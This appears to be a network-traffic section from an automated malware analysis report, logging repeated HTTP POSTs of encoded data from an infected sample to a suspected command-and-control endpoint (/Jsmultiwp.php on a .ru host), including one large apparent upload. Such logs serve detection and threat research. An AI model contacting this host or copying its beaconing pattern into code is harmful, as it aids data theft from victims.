cfL4;desc="?proto=TCP&rtt=2923&min_rtt=1602&rtt_var=3243&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=119947&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:00.885010004 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:01:01.234431028 CET	2528	OUT	Data Raw: 55 5e 5d 53 5d 58 50 53 5c 56 5b 59 50 5b 5a 59 50 54 59 5e 50 5f 53 5e 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U^]S]XPS\V[YP[ZYPTY^P_S^_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_ &2<?!/)$4838 %>4*;?[ 1/V;+$_" X(;

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:02.225627899 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1856 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:01:02.572952032 CET	1856	OUT	Data Raw: 55 58 58 59 5d 5e 50 53 5c 56 5b 59 50 5b 5a 5c 50 5d 59 58 50 5e 53 59 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UXXY]^PS\V[YP[Z\P]YXP^SY_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#'#!]?Z$Y!78A=43+Y&=Q488?<6;T8$_" X(;
Dec 10, 2024 19:01:03.485146999 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:03.846745014 CET	965	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwyCdkg3Qgm5N%2FOn6Gg5kyK9t%2BV1kfsD1GuGNIEwfjJ4WQrk%2FqUkH8xxVUBpleXvv4A%2FTFElvndA934lqvbTDm0bu0uIGMkOEhHDCpcBDHFry5PU%2FUEbCn1tCh50ndE8jDOM09W0Kes%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff23534bb37ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13919&min_rtt=2098&rtt_var=24429&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2179&delivery_rate=15103&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 27 11 20 5d 28 0d 22 1c 03 13 39 29 27 04 2e 16 09 5d 2e 28 08 06 21 29 3e 5e 2d 3f 26 5a 3d 3b 01 5e 32 32 36 5a 24 08 35 56 29 34 28 51 06 1c 25 16 24 5c 32 56 28 3f 21 1c 24 3e 2c 5b 2a 09 07 5a 3e 07 27 52 34 15 37 07 26 3e 3f 1b 2a 3f 0c 0e 24 05 2a 19 38 0a 22 00 32 07 2a 51 00 16 21 17 3c 31 1d 07 20 33 22 55 21 32 24 5f 2b 1c 33 12 25 3d 0e 1f 27 5a 22 13 30 05 24 00 27 01 29 57 27 2c 0d 14 20 11 0d 51 27 23 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98' ]("9)'.].(!)>^-?&Z=;^226Z$5V)4(Q%$\2V(?!$>,[Z>'R47&>??$8"2Q!<1 3"U!2$_+3%='Z"0$')W', Q'##]-(W?ZO0
Dec 10, 2024 19:01:03.852936983 CET	301	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 269592 Expect: 100-continue
Dec 10, 2024 19:01:04.189965010 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:04.190597057 CET	14832	OUT	Data Raw: 55 5b 5d 5e 58 5b 50 54 5c 56 5b 59 50 5e 5a 50 50 58 59 55 50 5a 53 55 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U[]^X[PT\V[YP^ZPPXYUPZSU_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#% =X<<670+7=Y <]0(Y2)7(;8!!;V,+$_" X(/
Dec 10, 2024 19:01:04.311202049 CET	4944	OUT	Data Raw: 35 2a 01 5c 31 39 2e 11 2b 33 04 1b 2d 21 08 20 05 06 2c 24 21 28 16 29 0a 0d 2e 5b 35 2a 11 31 30 28 28 14 35 07 54 14 0d 28 2d 33 00 3d 3a 59 21 2a 20 3b 26 23 1b 59 0e 0c 36 33 2a 0a 0d 3e 35 22 1b 5f 25 29 32 56 34 58 32 19 26 5a 33 58 3d 37 Data Ascii: 5\19.+3-! ,$!().[510((5T(-3=:Y!* ;&#Y63>5"_%)2V4X2&Z3X=7:4Z4;\?S6YT00":3""[;]4?:#13+,;,'W43[8+>?5=/#&[=T'<<<V9=>'>>&.)221926,T$=>?_"/$8?$;?[:?+#8)2"0'8+?(*<"X89=
Dec 10, 2024 19:01:04.311269045 CET	2472	OUT	Data Raw: 34 1a 18 25 06 01 28 52 0e 2b 3b 36 32 03 2f 17 2b 05 3e 16 3e 04 08 29 30 1e 51 1f 39 02 22 1f 28 2a 31 1a 28 56 27 0a 08 23 3d 14 08 31 05 2b 3c 29 06 22 24 10 19 0c 3b 2f 35 20 24 5a 2c 59 09 2e 10 2e 0b 2e 1a 23 09 2c 0a 2c 3d 1b 23 19 00 58 Data Ascii: 4%(R+;62/+>>)0Q9"(1(V'#=1+<)"$;/5 $Z,Y...#,,=#X[ $'5->%>"%/'!:5@>!?9:=0>-?289Y]9S35A.!<ZW$,?;Y,=-2T$><',;\007:>4@>)#;^[;;4801_0.439^>R.49$<( Y1-><P6(3!;440
Dec 10, 2024 19:01:04.311317921 CET	7416	OUT	Data Raw: 0a 2c 2d 29 38 3d 0e 5b 04 38 0a 16 06 3b 00 0a 06 26 14 12 31 54 55 1a 3c 5c 5a 5a 3f 5c 0a 0e 3c 0b 3e 5c 01 35 0d 2f 31 38 02 29 2d 29 14 1b 0d 2e 52 38 36 59 0f 03 21 27 20 27 39 0b 35 1a 3c 0c 25 56 33 54 11 57 34 3d 2a 24 08 14 2d 32 06 05 Data Ascii: ,-)8=[8;&1TU<\ZZ?\<>\5/18)-).R86Y!' '95<%V3TW4=$-2.;'46 %7<$,ST7Z!=32W^'85502/098V72/>8;60XS6;], ;<$).$2"_4;98S51!0?!!'1-&7<W_R<_? (Y+#:08 -[)4?=8=;>
Dec 10, 2024 19:01:04.311395884 CET	2472	OUT	Data Raw: 24 1f 28 56 3b 04 3b 18 3a 5a 3d 14 0a 59 01 22 38 14 16 3a 06 29 0c 38 2a 25 2a 2e 34 31 29 17 02 2b 34 3e 0b 01 02 37 3d 3e 2a 31 36 2b 33 5f 31 28 38 5e 30 29 59 34 3e 06 1b 26 2c 2d 3d 32 28 5d 0e 5a 0e 0c 39 2d 3d 26 08 08 06 56 02 56 02 3d Data Ascii: $(V;;:Z=Y"8:)8%.41)+4>7=>16+3_1(8^0)Y4>&,-=2(]Z9-=&VV=^)<[%_>)%&](;'',9[Y=0C8>%=_5%:2"H"26!-),0[,!.>X<%,?./;>5=S-/8;_5;/U"1=0;%;-"V+:8!,9=_]<;\0 ?&'+%Q[^
Dec 10, 2024 19:01:04.311444998 CET	2472	OUT	Data Raw: 34 00 1a 10 0d 27 05 11 28 5a 1a 5f 32 57 1a 36 33 07 0e 25 38 13 3d 04 25 21 1c 5c 3b 31 25 19 01 1e 23 36 0c 08 34 27 0b 3b 5a 32 36 58 0d 1a 22 06 06 59 3e 0d 3e 2d 17 30 1d 3a 08 0f 2b 00 2b 28 31 59 3c 12 28 2f 30 00 02 18 31 05 0f 1e 38 28 Data Ascii: 4'(Z_2W63%8=%!\;1%#64';Z26X"Y>>-0:++(1Y<(/018(*)X/[91Q;Z>>Y[90""7>&:U>$5_#[7 &???0_9\"S2-326_'S 5 X-9U"#98)70,/ 2QU677:31-&$X%2>?(5$7(4(T??432>-<) +0!/<Z
Dec 10, 2024 19:01:04.311665058 CET	2472	OUT	Data Raw: 2d 21 29 5f 30 5e 35 12 33 33 3d 59 30 5b 23 38 35 08 0b 5b 32 2e 2b 53 3f 2c 05 5d 31 21 1a 0a 3f 2e 58 1c 24 06 26 08 37 2f 22 3f 3f 2a 35 1e 37 04 51 12 07 08 48 05 09 54 5f 1f 39 22 33 5c 30 1b 38 1e 26 5b 15 2c 3e 02 31 5c 3c 2d 1a 1d 27 2c Data Ascii: -!)_0^533=Y0[#85[2.+S?,]1!?.X$&7/"??57QHT_9"3\08&[,>1\<-',-==?^![W=X40$1(8P!U#W6=0-B<<###_-$!<& \!0084%04] Y^(;3#,/,$<3X]];,!7%?,7^(>5)B78.3 1;$$;SS9U:/_3<4$\/^^)_-) _
Dec 10, 2024 19:01:04.405694008 CET	4944	OUT	Data Raw: 37 5d 22 30 2f 2c 20 3a 3e 0e 16 22 36 20 23 11 3f 2f 29 39 3b 03 2c 5d 00 39 30 06 30 5e 3a 23 2a 38 36 5e 30 0c 21 5f 05 16 02 04 34 04 0d 54 0e 23 59 20 34 2a 3b 2d 2e 3b 0e 01 07 3f 59 2b 36 5f 1b 1c 39 2f 03 02 16 28 33 1d 25 0c 39 3a 08 51 Data Ascii: 7]"0/, :>"6 #?/)9;,]900^:#86^0!_4T#Y 4;-.;?Y+6_9/(3%9:Q1V,:2"??(Q881$6W ]'?Y,T<Y$ 71Z=U0&#3#>S>729\%<' '=10<=-3<9W%6/[% <<( <>^W##)!&^"%XR$!4(99X;^#.>;0 ?782']
Dec 10, 2024 19:01:04.430531979 CET	2472	OUT	Data Raw: 24 35 2a 26 05 21 33 15 06 0e 22 2c 30 36 0f 0d 31 3f 22 2f 3b 02 24 5f 33 27 04 3d 04 04 38 0e 26 5d 2b 37 0e 3e 3c 25 01 3f 2a 2d 3c 06 2d 44 2c 20 25 5a 0a 36 35 56 04 2b 3a 2d 07 30 06 1c 37 0f 56 31 3e 33 3f 17 28 1a 53 07 3c 04 1a 55 0b 04 Data Ascii: $5&!3",061?"/;$_3'=8&]+7><%?-<-D, %Z65V+:-07V1>3?(S<U' ,=.,9-;Y7,+;8(6> 88?;W,)(=V-2\75& V:!68?16!>Y?=Q$@"?<8^4!=+&0?78#T8, ;2/$?/$;,A1B5U^-\==9".&?1?78\-2(>:
Dec 10, 2024 19:01:06.012628078 CET	812	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWaxcgNzWvJNvgR7HgEuFhDW8G%2FtNSTLy1JZSyXn7gukoAAI19uWfWz4s6EGYG2LfKUweLFD5nBNcuLCuvma1jpEE2hKNGfRgTsJJpOnPepDnlSqcDk7BqZ0GdmdRrAhZMnMF2gTENk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff23582ba07ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15317&min_rtt=2098&rtt_var=16313&sent=152&recv=291&lost=0&retrans=0&sent_bytes=1015&recv_bytes=272072&delivery_rate=166609&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a Data Ascii: 41]^V

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:02.435065031 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:01:02.791728020 CET	2528	OUT	Data Raw: 50 5a 5d 5f 5d 5e 55 55 5c 56 5b 59 50 5f 5a 51 50 5c 59 5f 50 58 53 5a 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: PZ]_]^UU\V[YP_ZQP\Y_PXSZ_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_ 2]<?4#4,=B%#?$$$1T#\8/'[5/+$_" X(+
Dec 10, 2024 19:01:03.760181904 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:04.073203087 CET	810	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jf1IO%2BfpdqusSUOtGsa3ayVqlfFCsQTaDafWYhreMmysqRtjixFtAxrj%2BrFfGYn9bAhoGxFO8QLCcO3WLqR55nu6OP%2B4z1iSiLTYLnISzGqHyD%2BFzNsgGCJjxH199gcRTzejzD5jEkc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff23556c8e78e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=78941&min_rtt=69432&rtt_var=32829&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=21027&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a Data Ascii: 41]^V
Dec 10, 2024 19:01:04.266181946 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:04.550178051 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:01:04.901156902 CET	2528	OUT	Data Raw: 55 54 5d 52 58 5d 55 53 5c 56 5b 59 50 54 5a 51 50 58 59 55 50 59 53 5d 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UT]RX]US\V[YPTZQPXYUPYS]_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#\& 5\?<!')4)7?4$^($(* (5,<+\"U,;$_" X(
Dec 10, 2024 19:01:05.672985077 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:06.333120108 CET	813	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MuRjyHUHmNtmPqwGKmtvHC0KSqZuYX05HVc0DOf2HpNrpJXnnzWqQzn3S9hkFN8x%2FOSxlZ9pOaSyDljigh4rbqhlM4xa%2BwGcAhAaK8HVEIpYLVH1%2BkSB3%2B7duvKL46RS4hR20ZaOfYg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff23617ee48c51-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3672&min_rtt=2126&rtt_var=3889&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=100731&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:07.157521009 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:01:07.510456085 CET	2528	OUT	Data Raw: 55 55 5d 59 5d 5b 55 50 5c 56 5b 59 50 54 5a 59 50 54 59 59 50 5a 53 5a 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UU]Y][UP\V[YPTZYPTYYPZSZ_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#]20-X+?8"+)%^"<3/]&;48[;?#_ 1?/$_" X(
Dec 10, 2024 19:01:08.271483898 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:08.740499020 CET	811	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1JH%2BVik0k2Da0AEnajvKggcICSWeiozXMbvVcDkrKoK25AUDdcHmrXsURPVYaATqRDX0L9xk8BVhou7ruGygaYfMZ6sCp1ofogU175X0%2FP%2F1dIb3c5jHlAyEX4L7ewaEFOCxWY2HM24%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff2371bfeb438a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9135&min_rtt=2295&rtt_var=14542&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=25604&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:08.977842093 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1856 Expect: 100-continue
Dec 10, 2024 19:01:09.322974920 CET	1856	OUT	Data Raw: 55 5b 5d 5f 5d 56 55 56 5c 56 5b 59 50 5e 5a 58 50 5b 59 59 50 5d 53 5e 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U[]_]VUV\V[YP^ZXP[YYP]S^_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#Y2 2+8X6'>7&4($?2]%T#(Z;?$!'T8$_" X(/
Dec 10, 2024 19:01:10.064294100 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:10.322381020 CET	964	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uKsrspuU3ZSR%2BpB4%2BJc9bT8Q%2FqQzeJqo5rTah24vXzJ6Chw5xPCBehXZFP7VCpoOO9dzTvn3OcWfByD00ATFvaLbwdeO2lwd2%2BZWyuDz72xtNdSd%2FSZBNPsCkOrkFoaVwo5rvBzQ2kA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff237cef33c3f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3152&min_rtt=1665&rtt_var=3600&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2155&delivery_rate=107614&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 27 5b 20 28 34 0e 21 31 21 5c 2d 39 20 59 39 28 2f 5f 3a 38 32 06 22 29 39 01 2e 05 2d 01 3d 3b 05 10 32 0c 36 59 25 26 3e 08 2a 34 28 51 06 1c 26 04 25 29 36 50 3f 3f 25 13 27 2d 01 06 28 24 21 16 29 3e 0a 0e 22 3b 1d 02 32 5b 3b 16 28 59 2e 0f 30 02 2a 1c 2c 0a 22 07 31 3d 2a 51 00 16 21 55 28 0f 33 02 22 33 25 0b 22 32 16 5e 2b 26 24 04 30 04 23 0f 24 12 3e 5d 25 3f 27 58 33 01 29 54 33 3c 0e 07 20 01 3b 55 31 09 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98'[ (4!1!\-9 Y9(/_:82")9.-=;26Y%&>4(Q&%)6P??%'-($!)>";2[;(Y.0,"1=*Q!U(3"3%"2^+&$0#$>]%?'X3)T3< ;U1#]-(W?ZO0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:01:08.995384932 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:01:09.354439020 CET	2528	OUT	Data Raw: 55 5d 58 58 58 5d 55 53 5c 56 5b 59 50 5c 5a 5f 50 55 59 5d 50 58 53 5d 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U]XXX]US\V[YP\Z_PUY]PXS]_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#\&U1=/<6 $ 4'8<%9V4,<58,$_" X('
Dec 10, 2024 19:01:10.081173897 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:10.574063063 CET	819	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8mTAJX4J2D95qbDY6Jbssy%2FxLJIqam0AJb2CkqSFk%2FMlg4wRmp6h5KYoaeLqdn%2B2ApDe6%2BiMU1I%2BOS8JJQ1Nge%2FLUpL9mbjdViyqz5lI%2BjTdOfU5ag23vlXTbNaAJgT2Tygpdx968M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff237d082543a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3099&min_rtt=1780&rtt_var=3306&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=118362&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0